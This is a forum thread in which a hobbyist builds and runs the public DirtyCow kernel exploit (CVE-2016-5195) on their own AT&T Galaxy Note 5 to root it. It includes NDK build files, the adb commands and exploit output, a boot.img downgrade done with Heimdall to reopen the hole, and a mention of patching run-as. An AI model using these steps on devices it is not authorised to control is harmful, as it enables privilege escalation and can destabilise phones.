HELP: Note 5 AT&T Nov. Sec. Patch. (I executed dirtycow, have photo evidence, but how?)

[droidvoider]

dirtycow always says it works for me and quickly but it has only worked once. I am passionately trying to rediscover how I did it. (I patched /system/build.prop and it showed in recovery!)

2 Possibilities of how: First Possibility: I just got done flashing the wrong files in Download Mode repeatedly getting fails. I tried rooting files that almost finished, rooting files for 5.11 that did finish but didn't boot. Finally I put just the AP file back (excluding BL+CP+CSC files) and it booted, then I executed.. (did i crash the November 1 2016 update, or get at the kernel somehow on a locked bootloader?)

Second Possibility: I accidentally delete the directory containing the version I used. Maybe I found a version for Samsung or compiled it differently?? (I was trying tons of dirtycow compilations) CVE-2016-5195 = SVE-2016-7504 (double patched?) Google says the fix is called CVE-2016-5195 patched 11-05-2016, however my security patch level is Nov 1st, 2016. The Samsung SVE-2016-7504 is stated to be included in November's patches and there are 14 patches in that set. AT&T N920AUCS4CPK1 has a note about 14 patches from Samsung, the exact number. (so I seem to be patched if I follow the logic even though Google responded on 11/05/2016 but I dunno how to confirm what's in this Nov 1 2016 security patch in the PK1 firmware.)

Samsung Note 5 7420Exynos, here's what I'm building with.

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23

***Android.mk***
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_SRC_FILES := \
  dirtycow.c
LOCAL_MODULE := dirtycow
LOCAL_LDFLAGS   += -llog
LOCAL_CFLAGS    += -DDEBUG

(I try these flags also, separately.. I am learning C on Android, I like it.)

LOCAL_CFLAGS    += -fPIE
LOCAL_LDFLAGS   += -fPIE -pie

include $(BUILD_EXECUTABLE)

[timwr]

Can you try make test? Does it work?

[droidvoider]

Thanks I guess not

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23
make[1]: Entering directory '/home/mm/Downloads/timwr-CVE-2016-5195-master'
[arm64-v8a] Compile        : dirtycow <= dirtycow.c
[arm64-v8a] Compile        : dirtycow <= dcow.c
[arm64-v8a] Executable     : dirtycow
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Compile        : run-as <= dirtycow.c
[arm64-v8a] Compile        : run-as <= run-as.c
[arm64-v8a] Executable     : run-as
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory '/home/mm/Downloads/timwr-CVE-2016-5195-master'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
[100%] /data/local/tmp/test.sh
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2017-02-21 21:15 test
-rwxrwxrwx shell    shell         367 2017-01-23 01:20 test.sh
-r--r--r-- shell    shell          18 2017-02-21 21:15 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x7fb729a000
[*] currently 0x7fb729a000=76746f6e72756f79
[*] using /proc/self/mem method
[*] madvise = 0x7fb729a000 18
[*] madvise = 0 610265
[*] /proc/self/mem 761778 42321
[*] exploited 0 0x7fb729a000=626172656e6c7576
adb shell 'cat /data/local/tmp/test2'
yournotvulnerable
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 796f 7572 6e6f 7476 756c 6e65 7261 626c  yournotvulnerabl
00000010: 650d 0a                                  e..

[droidvoider]

DIRTYCOW NOW SAYS VULNERABLE ON THE TEST!!!! woo!!! flashed boot.img from previous firmware!

My phone reboots if I try to alter things in /data/data/app-name but it doesn't if I patch the /system/bin/run-as .. Guess I could patch the reboot command to 0000000 (LAUGH)

This makes me so happy: adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2' dcow /data/local/tmp/test /data/local/tmp/test2 [] size 18 [] mmap 0x7fae7e6000 [] currently 0x7fae7e6000=76746f6e72756f79 [] using /proc/self/mem method [] madvise = 0x7fae7e6000 18 [] madvise = 0 41 [] /proc/self/mem 486 27 [] exploited 0 0x7fae7e6000=626172656e6c7576 adb shell 'cat /data/local/tmp/test2' vulnerable!!!!!!! adb shell 'cat /data/local/tmp/test2' | xxd 00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121 vulnerable!!!!!! 00000010: 210d 0a

edit: I hate when people say they did something and if they only mentioned how you could finally sleep!! I used heimdal for Ubuntu 16.01. It's a little bit of a read to get it installed but then after that you can use sudo apt-get install heimdall-frontend 'i think, or close to that command'

1. Take pit file from the csc image file of your firmware.. (i will like post this xda for note 5 PK1)
2. Take boot.img from PJ1 versoin, or whatever you are attempting.
3. Load pit, add, browse for image, flash, profit.

edit: You can downgrade your kernel from PK1 down to PE6 to play with stuff. Unlike the one baseband roll back your kernel binaries won't match secure storage, a lot of stuff. wifi in/out .. I didn't observe any elevated temps but it was turning my mic off/on off/on and wigging the hell out. So I didn't try anything except verifying cow then I restored my boot.img, took awhile for logcat to clean up but it did. (why would you do this.. hey! don't do this)

[timwr]

:) great stuff @droidvoider